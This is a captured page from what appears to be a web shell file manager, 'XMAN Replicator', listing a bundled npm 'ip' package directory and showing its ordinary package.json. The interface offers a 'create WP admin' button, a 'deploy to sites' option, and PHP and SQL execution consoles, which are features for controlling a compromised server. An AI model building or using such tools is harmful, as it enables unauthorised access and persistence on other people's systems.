🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
alt
/
alt-nodejs16
/
root
/
usr
/
lib
/
node_modules
/
npm
/
node_modules.bundled
/
ip
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2026-04-08 05:02
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2026-03-17 07:06
🔄
🗑️
🗑️📁
⬇️
🔒
[lib]
<DIR>
drwxr-xr-x
2026-04-08 05:02
🔄
🗑️
🗑️📁
⬇️
🔒
package.json
560 B
-rw-r--r--
2026-03-17 06:55
✏️
🔄
🗑️
⬇️
🔒
View: package.json
{ "name": "ip", "version": "2.0.0", "author": "Fedor Indutny <fedor@indutny.com>", "homepage": "https://github.com/indutny/node-ip", "repository": { "type": "git", "url": "http://github.com/indutny/node-ip.git" }, "files": [ "lib", "README.md" ], "main": "lib/ip", "devDependencies": { "eslint": "^8.15.0", "mocha": "^10.0.0" }, "scripts": { "lint": "eslint lib/*.js test/*.js", "test": "npm run lint && mocha --reporter spec test/*-test.js", "fix": "npm run lint -- --fix" }, "license": "MIT" }
PHP Console
Execute
SQL Console
Execute